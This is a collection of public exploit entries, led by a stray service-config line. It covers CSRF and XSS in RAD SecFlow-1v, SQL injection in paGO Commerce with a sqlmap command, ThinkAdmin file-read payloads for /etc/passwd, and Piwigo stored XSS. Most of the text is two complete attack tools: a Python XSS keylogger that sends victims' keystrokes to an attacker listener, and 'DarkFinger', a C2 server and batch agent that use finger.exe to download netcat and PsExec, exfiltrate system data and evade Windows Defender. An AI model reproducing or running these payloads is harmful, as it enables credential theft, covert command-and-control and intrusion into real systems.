LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Nexpose Scan Engine DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot) # Date: 2020-08-31 # Exploit Author: Uriel Yochpaz and Jonatan Schor # Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway # Version: SecFlow-1v os-image SF_0290_2.3.01.26 # Tested on: RAD SecFlow-1v # CVE : N/A A vulnerability in the web-based management interface of RAD SecFlow-1v could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260. # Proof of Concept By persuading an authenticated user to open a web page containing the following code: <img src="https://SecFlow-1v_IP/devicereboot.php?restart=1&isSubmitted=1"> A reboot operation would begin. This attack could execute any operation available at the web-based management interface (File uploads, Scheduled and immediate reboots, Factory reset etc.) # Full Account Takeover As mentioned above, this exploit could be used in conjunction with CVE-2020-13260 (Stored-XSS), by using the CSRF exploit to upload a malicious file to a Stored-XSS vulnerabale page, which could allow Full Account Takeover. For further information and full PoC: https://github.com/UrielYochpaz/CVE-2020-13259 # Timeline May 19th, 2020 - Vulnerability exposed. May 19th, 2020 – Vulnerability reported to RAD. May 21th, 2020 – Vulnerability reported to MITRE. May 21th, 2020 – MITRE assigned CVE: CVE-2020-13259. May 22th, 2020 – Contacted RAD for further details and cooperation. Aug 25th, 2020 – RAD patched the vulnerability.

# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting # Date: 2020-08-31 # Exploit Author: Jonatan Schor and Uriel Yochpaz # Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway # Version: SecFlow-1v os-image SF_0290_2.3.01.26 # Tested on: RAD SecFlow-1v # CVE : N/A A Stored-XSS vulnerability was found in multiple pages in the web-based management interface of RAD SecFlow-1v. An attacker could exploit this vulnerability by uploading a malicious file as the OVPN file in Configuration-Services-Security-OpenVPN-Config or as the static key file in Configuration-Services-Security-OpenVPN-Static Keys. These files content is presented to users while executing malicious stored JavaScript code. This could be exploited in conjunction with CVE-2020-13259 # Proof of Concept Upload a file containing the following JS code: <img src=x onerror=alert(1)> Refresh the page and observe the malicious JS code execute every time you browse the compromised page. # Full Account Takeover As mentioned above, this exploit could be used in conjunction with CVE-2020-13259 (CSRF), by using the CSRF exploit to upload a malicious file to a Stored-XSS vulnerabale page, which could allow Full Account Takeover. For further information and full PoC: https://github.com/UrielYochpaz/CVE-2020-13259 # Timeline May 19th, 2020 - Vulnerability exposed. May 19th, 2020 – Vulnerability reported to RAD. May 21th, 2020 – Vulnerability reported to MITRE. May 21th, 2020 – MITRE assigned CVE: CVE-2020-13260. May 22th, 2020 – Contacted RAD for further details and cooperation. Aug 25th, 2020 – RAD patched the vulnerability.

# Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated) # Date: 2020-08-21 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Author ID: 8763 # Vendor Homepage: https://www.corephp.com/ # Software Link: https://www.corephp.com/joomla-products/pago-commerce # Version: 2.5.9.0 # Tested on: Apache2 Vulnerable param: filter_published ------------------------------------------------------------------------- POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 163 Origin: http://localhost Connection: close Referer: http://localhost/joomla/administrator/index.php?option=com_pago&view=comments Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1 Upgrade-Insecure-Requests: 1 filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1 ------------------------------------------------------------------------- sqlmap poc: sqlmap -r pago --dbs --risk=3 --level=5 --random-agent -p filter_published [Gais Security]<https://www.gaissecurity.com> [Gais Security] [Gais Security] Mehmet KELEPÇE Penetration Tester | Red Team

# Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-09-14 # CVE ID: CVE-2020-23835 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/tailor.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS) # CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - Type 1: Reflected XSS # CWE-523: Unprotected Transport of Credentials # CVSS Base Score: 6.4 # Impact Subscore: 4.7 # Exploitability Subscore: 1.6 # CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L # Vulnerability Description: # Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of SourceCodesters Tailor Management System v1.0 allows remote attackers to harvest keys pressed via unauthenticated victim clicking malicious URL and typing. # Reflected XSS Key Logger import socket,sys,urllib,re from thread import * from colorama import Fore, Style F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0] R, C, G = Fore.RED, Fore.CYAN, Fore.GREEN def urlEncode(javascript): return urllib.quote(javascript) def genXssPayload(LHOST,LPORT): XSS_PAYLOAD = '<script>' XSS_PAYLOAD += 'var xhr = new XMLHttpRequest();' XSS_PAYLOAD += 'document.onkeypress = function keyLogger(key) {' XSS_PAYLOAD += 'key_press = String.fromCharCode(key.which);' XSS_PAYLOAD += 'var uri = "http://'+LHOST+':'+LPORT+'?KEY="+key_press;' XSS_PAYLOAD += 'xhr.open("GET", uri, true);' XSS_PAYLOAD += 'xhr.send();}' XSS_PAYLOAD += '</script>' return XSS_PAYLOAD def clientthread(conn): try: while True: data = conn.recv(1024) key = re.findall(r'KEY\=\w',data) key = re.sub('KEY\=','',key[0]) print(printKey(key)) if not data: break except: conn.close() def banner(): BANNER = S[3]+C+' _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ \n' BANNER += C+'|\ /|\ /|\ /| |\ /|\ /|\ /| |\ /|\ /|\ /|\ /|\ /|\ /|\n' BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n' BANNER += C+'| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n' BANNER += C+'| | '+R+'X'+C+' | | | '+R+'$'+C+' | | | '+R+'$'+C+' | | | | '+R+'K'+C+' | | | '+R+'3'+C+' | | | '+R+'Y'+C+' | | | | '+R+'L'+C+' | | | '+R+'0'+C+' | | | '+R+'G'+C+' | | | '+R+'G'+C+' | | | '+R+'3'+C+' | | | '+R+'R'+C+' | |\n' BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n' BANNER += C+'|/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|\n\r\n' BANNER += ' '+R+'BOKU '+F[0]+'&'+C+' HYD3SEC'+F[0]+S[0]+'\r\n' return BANNER def printKey(key): keyGen = S[3]+C+' _______\n' keyGen += C+' |\ /|\n' keyGen += C+' | +---+ |\n' keyGen += C+' | | | |\n' keyGen += C+' | | '+R+key+C+' | |\n' keyGen += C+' | +---+ |\n' keyGen += C+' |/_____\|'+F[0]+S[0] return keyGen def header(): head = S[1]+F[2]+' __---* '+F[7]+'Tailor MS v1.0 '+F[2]+'| '+F[7]+'Reflected XSS Key Logger '+F[2]+'*---__\n'+S[0] return head def formatHelp(STRING): return S[3]+F[2]+STRING+S[0] if __name__ == "__main__": print(header()) print(banner()) if len(sys.argv) != 4: print(ok+formatHelp(" Usage: python %s <WEBAPP_URL> <LHOST> <LPORT>" % sys.argv[0])) print(ok+formatHelp(" Example: python %s 'http://172.16.65.134/tailor/' '172.16.65.1' 80\r\n" % sys.argv[0])) print(err+"Try Again..\r\n") sys.exit(-1) WEBAPP_URL = sys.argv[1] LHOST = sys.argv[2] LPORT = sys.argv[3] if not re.match(r".*/$", WEBAPP_URL): WEBAPP_URL = WEBAPP_URL+'/' WEBAPP_URL = WEBAPP_URL+'index.php' PAYLOAD = genXssPayload(LHOST,LPORT) ENCODED_PAYLOAD = urlEncode(PAYLOAD) print(ok+F[0]+'To '+S[3]+F[2]+'Harvest Keys'+F[0]+S[0]+', have a'+F[3]+' User '+F[0]+'visit '+F[5]+'this URL'+F[0]+' and '+F[7]+'Login'+F[0]+':\r\n') print(S[3]+F[5]+WEBAPP_URL+'?error=ALL%20YOUR%20K3Y$%20ARE%20BELONG%20TO%20US.%20'+ENCODED_PAYLOAD+S[0]+'\r\n') LPORT = int(LPORT) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((LHOST,LPORT)) print(ok+S[1]+G+"Binding to Socket."+F[0]+S[0]) s.listen(100) print(ok+S[1]+G+"Listening on Socket for incoming connections."+F[0]+S[0]) try: while 1: conn, addr = s.accept() start_new_thread(clientthread ,(conn,)) except: s.close() print('\r\n'+err+"Exiting Keylogger Credential Harvester..")

# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read # Google Dork: N/A # Date: 2020-09-14 # Exploit Author: Hzllaga # Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/ # Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a # Version: v6 <= 2020.08.03.01 # Tested on: PHP7.4.7,Apache # CVE : CVE-2020-25540 PoC: On Windows read database.php payload: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34 On Linux read /etc/passwd payload: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s

# Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software # Author: John Page (aka hyp3rlinx) # Date: 2020-09-16 # Website: hyp3rlinx.altervista.org # Source: http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt # twitter.com/hyp3rlinx # ISR: ApparitionSec Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS, can be used as a file downloader and makeshift C2 channel. Legitimate use of Windows Finger Command is to send Finger Protocol queries to remote Finger daemons to retrieve user information. However, the finger client can also save the remote server response to disk using the command line redirection operator ">". Intruders who compromise a computer may find it is locked down and "unknown" applications may be unable to download programs or tools. By using built-in native Windows programs, its possible they may be whitelisted by installed security programs and allowed to download files. Redteams and such using LOL methods have made use of "Certutil.exe", native Windows program for downloading files. However, Certutil.exe is recently blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://. Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data. The Finger protocol as a C2 channel part works by abusing the "user" token of the FINGER Query protocol "user@host". C2 commands masked as finger queries can download files and or exfil data without Windows Defender interference. Download files: C:\> finger <C2-Command>@HOST > Malwr.txt Exfil running processes: C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@192.168.1.21 Typically, (Port 79) default port used by FINGER protocol is often blocked by organizations. Privileged users can bypass this using Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions to reach servers using unrestricted ports like 80/443. Portproxy queries are then sent first to the Local Machines ip-address which are then forwarded to the C2 server specified. Port 43 (WHOIS) traffic. netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43 netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79 To display Portproxy use "C:\>netsh interface portproxy show all". E.g. using Port 79 Ncat64.exe "nc@C2-Server" > tmp.txt E.g. using Portproxy, send the query to local-ip first. Ncat64.exe "nc@Local-IP" > tmp.txt To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files. DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads. DarkFinger C2 expects exfil data to prefixed with the dot "." character, so any arbitrary inbound querys are not confused for exfil. This can be changed to whatever or even expanded upon to use XOR obfuscation methods etc... as this is just for basic PoC. [Event Logs / Forensics] Certutil.exe file downloads are now blocked and logged by Windows Defender. "Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software. Name: Trojan:Win32/Ceprolad.A ID: 2147726914 Severity: Severe Category: Trojan ... etc" PowerShell, also used as an LOL method to download files usually generates Windows event logs. Finger initiated downloads write to disk and will leave forensic artifacts. Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well. However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere. DarkFinger.py C2 is very basic with no security. It's only to demonstrate using Windows Finger Command for as a C2 channel and show the possibilities. Therefore, anyone can request to change the Port DarkFinger C2 listens on and or download files. During my research, I found nothing on the internet publicly using or documenting Windows TCPIP Finger Command for use as C2 channel. Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat" which calls the Windows finger.exe in attacker friendly ways. Tested successfully Windows 10. [DarkFinger-C2.py] import socket,sys,re,time,os,argparse from subprocess import * from subprocess import Popen, PIPE, STDOUT #DarkFinger / Windows Finger TCPIP Command C2 Server (c) #Downloader and Covert Data Tunneler #By John Page (aka hyp3rlinx) #ApparitionSec #twitter.com/hyp3rlinx # #File Downloads must be Base64 encoded text-files. #Agents can change the port DarkFinger listens on dynamically: #E.g. set to listen on port 80 #C:\>finger.exe !80!@DarkFinger-Server #When not using Port 79, we need a Portproxy to send Port 79 traffic outbound to the specified Port. #Also, when using Ports other than Port 79 (default) we issue queries first to the machine running the Agent E.g. #C:\>finger.exe <Command>@<Local-Machines-IP> # #Agents can change the Download wait time, to try an ensure files are fully downloaded before closing connections. #Default time sent by the DF-Agent.bat PoC script is set to 10 seconds when issuing Download commands. #Changing wait time before closing the socket when downloading PsExec64.exe E.g. #C:\>finger.exe ps%<Wait-Time-Secs>%@%<DarkFinger-Server>% #============================================================================================================== # port = 79 #Default if the client unable to Portproxy, use port 80/443 if possible. downloads_dir = "Darkfinger_Downloads" #Directory containing the Base64 encoded files for download nc64 = downloads_dir+"\\nc.txt" #Base64 encoded Netcat psexec = downloads_dir+"\\ps.txt" #Base64 encoded PsExec64 byte_sz = 4096 #Socket recv allowed_ports = [22,43,53,79,80,443] #Restrict to a few. BANNER=""" ____ __ _______ / __ \____ ______/ /__/ ____(_)___ ____ ____ _____ / / / / __ `/ ___/ //_/ /_ / / __ \/ __ `/ _ \/ ___/ / /_/ / /_/ / / / ,< / __/ / / / / / /_/ / __/ / /_____/\__,_/_/ /_/|_/_/ /_/_/ /_/\__, /\___/_/ /____/ v1 Finger TCPIP Command C2 Server By hyp3rlinx ApparitionSec """ def remove_cert_info(f): try: r1 = open(f) lines = r1.readlines() lines = lines[1:] r1.close() w1 = open(f,'w') w1.writelines(lines) w1.close() r2 = open(f) lines2 = r2.readlines() lines2 = lines2[:-1] r2.close() w2 = open(f,'w') w2.writelines(lines2) w2.close() except Exception as e: print(str(e)) exit() def create_base64_files(file_conf): global downloads_dir if os.path.exists(file_conf): if os.stat(file_conf).st_size == 0: print("[!] Warn: Supplied conf file is empty, no downloads were specified!") exit() else: print("[!] Supplied conf file does not exist :(") exit() try: path=os.getcwd() if not os.path.exists(path+"\\"+downloads_dir): os.makedirs(downloads_dir) f=open(file_conf, "r") for x in f: x = x.strip() if os.path.exists(path+"\\"+x): proc = Popen(["certutil.exe", "-encode", path+"\\"+x, path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"], stdout=PIPE, stderr=PIPE, shell=False) out, err = proc.communicate() if "ERROR_FILE_EXISTS" in str(out): print("[!] Cannot encode " + x[:2]+".txt" + " as it already exists, delete it (-d flag) and try again :(") exit() time.sleep(0.5) #Remove certificate info generated by Windows Certutil. if os.path.exists(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"): remove_cert_info(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt") print("[+] Created " + x + " Base64 encoded text-file "+x[:2].lower()+".txt" +" for download.") else: print("[!] Warn: File specified in the conf file to Base64 encode ("+x+") does not exist!") exit() f.close() except Exception as e: print(str(e)) def delete_base64_files(): global downloads_dir path=os.getcwd() if os.path.exists(path+"\\"+downloads_dir): try: filelist = [ f for f in os.listdir(path+"\\"+downloads_dir) if f.endswith(".txt") ] for f in filelist: os.remove(os.path.join(path+"\\"+downloads_dir, f)) except Exception as e: print(str(e)) exit() def B64Exec(t): payload="" try: f=open(t, "r") for x in f: payload += x f.close() except Exception as e: pass print(str(e)) return 9 return payload def finga_that_box(cmd, victim): cmd = cmd.rstrip() if cmd[:1] != ".": cmd = cmd[0:2] if cmd == "nc": print("[+] Serving Nc64.exe") sys.stdout.flush() return nc64 if cmd == "ps": print("[+] Serving PsExec64.exe") sys.stdout.flush() return psexec if cmd[:1] == ".": print("[+] Exfil from: "+ victim[0] + " " +cmd[1:]) sys.stdout.flush() return False def fileppe_fingaz(): global byte_sz, port, allowed_ports delay=1 s = socket.socket() host = "" try: if port in allowed_ports: s.bind((host, port)) s.listen(5) else: print("[!] Port disallowed, you can add it to the 'allowed_ports' list.") exit() except Exception as e: print(str(e)) exit() print("[/] Listening port:", str(port)) sys.stdout.flush() try: while True: conn, addr = s.accept() a = conn.recv(byte_sz).decode() #Py 2 #Let agent change port dynamically try: if a[:1]=="!": idx = a.rfind("!") if idx != -1: port = str(a[1:idx]) if int(port) in allowed_ports: port = int(port) time.sleep(1) conn.close() s.close() fileppe_fingaz() else: print("[!] Disallowed port change request from: %s" % addr[0]) #Let agent set time to wait dynamically. if a[:1] != "." and a[:1] != "!": if re.search(r'\d\d', a[2:4]): delay=int(a[2:4]) print("[-] Agent set the delay to: %d" % delay) sys.stdout.flush() except Exception as e: print(str(e)) pass t = finga_that_box(a, addr) if t: exe = B64Exec(t) if exe == 9: conn.close() continue if exe: try: conn.sendall(exe.encode()) time.sleep(delay) conn.close() delay=1 except Exception as e: pass #print(str(e)) sys.stdout.flush() conn.close() delay=1 s.close() except Exception as e: print(str(e)) pass finally: s.close() fileppe_fingaz() def about(): print("[+] Darkfinger is a basic C2 server that processes Windows TCPIP Finger Commands.") print(" ") print("[+] File download requests require the first two chars (lowercase) for the file we want,") print("[+] plus the wait time, this trys to ensure a full transmit before close the connection.") print("[+] Download Ncat64.exe and wait 30-secs before closing the socket:") print("[+] finger.exe nc30@DarkFinger > tmp.txt") print(" ") print("[+] Exfil Windows Tasklist using the '.' character used as the DarkFinger exfil flag:") print("[+] cmd /c for /f \"tokens=1\" %i in ('tasklist') do finger .%i@DarkFinger-Server") print("[+]") print("[+] If Port 79 is blocked, use Windows Netsh Portproxy to reach allowed internet Ports.") print("[+] Dynamically change the port Darkfinger C2 listens on to port 80:") print("[+] finger.exe !80!@DarkFinger-Server") print(" ") print("[+] DarkFinger-Agent.bat script is the client side component to demonstrate capabilities.") print("[+] Note: This is just a basic PoC with no type of real security whatsoever.") print("[+] Disclaimer: Author not responsible for any misuse and or damages by using this software.") def main(args): global port print(BANNER) if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) if args.about: about() exit() if args.port: port = int(args.port) if args.conf and args.delete: delete_base64_files() if args.conf: create_base64_files(args.conf) else: print("[!] Warn: No Base64 files created for download!, add required -c flag.") exit() fileppe_fingaz() def parse_args(): parser.add_argument("-p", "--port", help="C2 Server Port", nargs="?") parser.add_argument("-c", "--conf", help="Textfile of tools to Base64 encode for download.", nargs="?") parser.add_argument("-d", "--delete", nargs="?", const="1", help="Delete previously created Base64 encoded files on startup, -c required.") parser.add_argument("-a", "--about", nargs="?", const="1", help="Darkfinger information") return parser.parse_args() if __name__ == "__main__": parser = argparse.ArgumentParser() main(parse_args()) [DarkFinger-Agent.bat] @ECHO OFF CLS ECHO [+] Windows TCPIP Finger CMD Agent (c) ECHO [+] For DarkFinger C2 Server PoC ECHO [+] By hyp3rlinx ECHO [+] ApparitionSec ECHO =================================== @ECHO. REM Default download save location. CD \Users\%username%\Desktop REM Default download delay time to try an ensure full transfer. SET DELAY=10 SET FAIL_MSG=[!] Attempted a failed Admin operation ugh :( net session >nul 2>&1 IF %errorLevel% == 0 ( ECHO [+] Got Admin privileges!. SET /a Admin = 0 GOTO Init ) ELSE ( ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!. SET /a Admin = 1 SET DARK_PORT=79 GOTO CheckOutbound79 ) :Init for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%b SET LOCAL_IP=%LOCAL_IP: =% ECHO [+] Local IP: %LOCAL_IP% REM default for non admin as cant set Portproxy. SET /P DARK_IP="[+] DarkFinger C2 Host/IP: " SET /P DARK_PORT="[+] DarkFinger C2 Port: " IF NOT %DARK_PORT%==79 ( ECHO [!] Ports other than 79 typically require a Portproxy. GOTO AddNetshPortProxy ) ELSE ( GOTO CmdOpt ) :CheckOutbound79 ECHO [!] Must use the default Port 79 :( good luck. SET /P CHKPORT="[+] Check if hosts reachable? Y to continue N to abort: " SET CHKPORT=%CHKPORT: =% IF /I %CHKPORT% == y ( SET /P DARK_IP="[+] DarkFinger C2 Host/IP: " cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}" ECHO. ) ELSE ( ECHO [!] Aborting... :( GOTO Close ) :CmdOpt ECHO 1.Download PsExec64 ECHO 2.Download Nc64 ECHO 3.Exfil Tasklist ECHO 4.Exfil IP Config ECHO 5.Remove Netsh PortProxy ECHO 6.Change C2 Server Port - 22 43 53 79 80 443 ECHO 7.Show Current Portproxy ECHO 8.Change Portproxy ECHO 9.Delete Portproxy and exit ECHO 10.Exit Agent @ECHO. SET /P doit="Select option: " IF "%doit%"=="1" GOTO PsExec64 IF "%doit%"=="2" GOTO Nc64 IF "%doit%"=="3" GOTO ExfilTasklist IF "%doit%"=="4" GOTO ExfilIPConfig IF "%doit%"=="5" GOTO RemNetShPortProxy IF "%doit%"=="6" GOTO ChgC2ServerPort IF "%doit%"=="7" GOTO ShowPortProxy IF "%doit%"=="8" GOTO ChgPortProxy IF "%doit%"=="9" GOTO DelProxyNClose IF "%doit%"=="10" GOTO Close :ChgPortProxy IF %Admin% == 0 ( GOTO Init ) ELSE ( ECHO %FAIL_MSG% @ECHO. GOTO CmdOpt ) :PsExec64 SET Tool=PS ECHO [-] Downloading PsExec64.exe, saving to Desktop as PS.EXE ECHO [-] Wait... IF %DARK_PORT%==79 ( SET IP2USE=%DARK_IP% ) ELSE ( SET IP2USE=%LOCAL_IP% ) call finger ps%DELAY%@%IP2USE% > tmp.txt GOTO CleanFile :Nc64 SET Tool=NC ECHO [-] Downloading Nc64.exe, saving to Desktop as NC.EXE ECHO [-] Wait... IF %DARK_PORT%==79 ( SET IP2USE=%DARK_IP% ) ELSE ( SET IP2USE=%LOCAL_IP% ) call finger nc%DELAY%@%IP2USE% > tmp.txt GOTO CleanFile REM remove first two lines of tmp.txt as contains Computer name. :CleanFile call cmd /c more +2 tmp.txt > %Tool%.txt GOTO RemoveTmpFile :RemoveTmpFile call cmd /c del %CD%\tmp.txt GOTO B64Exe REM Reconstruct executable from the Base64 text-file. :B64Exe call certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nul @ECHO. call cmd /c del %CD%\%Tool%.txt GOTO CmdOpt :ExfilTasklist REM uses "." prefix to flag as incoming exfil data. IF "%DARK_PORT%"=="79" ( SET USE_IP=%DARK_IP% ) ELSE ( SET USE_IP=%LOCAL_IP% ) cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP% GOTO CmdOpt :ExfilIPConfig REM uses "." prefix to flag as incoming exfil data. IF "%DARK_PORT%"=="79" ( SET USE_IP=%DARK_IP% ) ELSE ( SET USE_IP=%LOCAL_IP% ) cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do finger ".%%a"@%USE_IP% GOTO CmdOpt :DelProxyNClose ECHO [!] Removing any previous Portproxy from registry and exiting. REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1 ECHO [!] Exiting... EXIT /B :AddNetshPortProxy SET OK=0 SET /P OK="[!] 1 to Continue:" IF NOT %OK% EQU 1 ( ECHO [!] Aborted... @ECHO. GOTO CmdOpt ) ECHO [!] Removing any previous Portproxy from registry. REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1 SET LOCAL_FINGER_PORT=79 IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT% IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT% IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT% IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT% IF %Admin% == 0 netsh interface portproxy show all GOTO CmdOpt :RemNetShPortProxy IF %Admin% == 1 ( ECHO %FAIL_MSG% @ECHO. GOTO CmdOpt ) ELSE ( ECHO [!] Removing NetSh PortProxy from registry. REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1 ) IF %DARK_PORT%==79 ( GOTO CmdOpt ) ELSE ( GOTO Init ) :ShowPortProxy netsh interface portproxy show all GOTO CmdOpt REM Allows agent to change the DarkFinger C2 listener port. :ChgC2ServerPort IF %Admin% == 1 ( ECHO %FAIL_MSG% @ECHO. GOTO CmdOpt ) SET /P TMP_PORT="[+] DarkFinger listener Port: " IF %DARK_PORT%==79 finger !%TMP_PORT%!@%DARK_IP% IF NOT %DARK_PORT%==79 finger !%TMP_PORT%!@%LOCAL_IP% SET DARK_PORT=%TMP_PORT% ECHO [!] Attempted to change the DarkFinger remote Port to %TMP_PORT%. IF NOT %DARK_PORT%==79 ECHO [!] Non default finger port used, must set a new Portproxy. ( GOTO RemNetShPortProxy ) ELSE ( GOTO CmdOpt ) :Close EXIT /B [PoC Video URL] https://www.youtube.com/watch?v=cfbwS6zH7ks [Network Access] Remote [Disclosure Timeline] September 11, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Piwigo 2.10.1 - Cross Site Scripting # POC by: Iridium # Software Homepage: http://www.piwigo.org # Version : 2.10.1 # Tested on: Linux & Windows # Category: webapps # Google Dork: intext: "Powered by Piwigo" # CVE : CVE-2020-9467 ######## Description ######## Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request because of the pwg.images.setInfo function. ######## Proof of Concept ######## *Request* POST /piwigo/ws.php?format=json HTTP/1.1 Host: [victim] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 79 Origin: http://[victim] Connection: close Referer: http://[victim]/piwigo/admin.php?page=photos_add&section=direct Cookie: pwg_id=08tksticrdkctrvj3gufqqbsnh method=pwg.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E

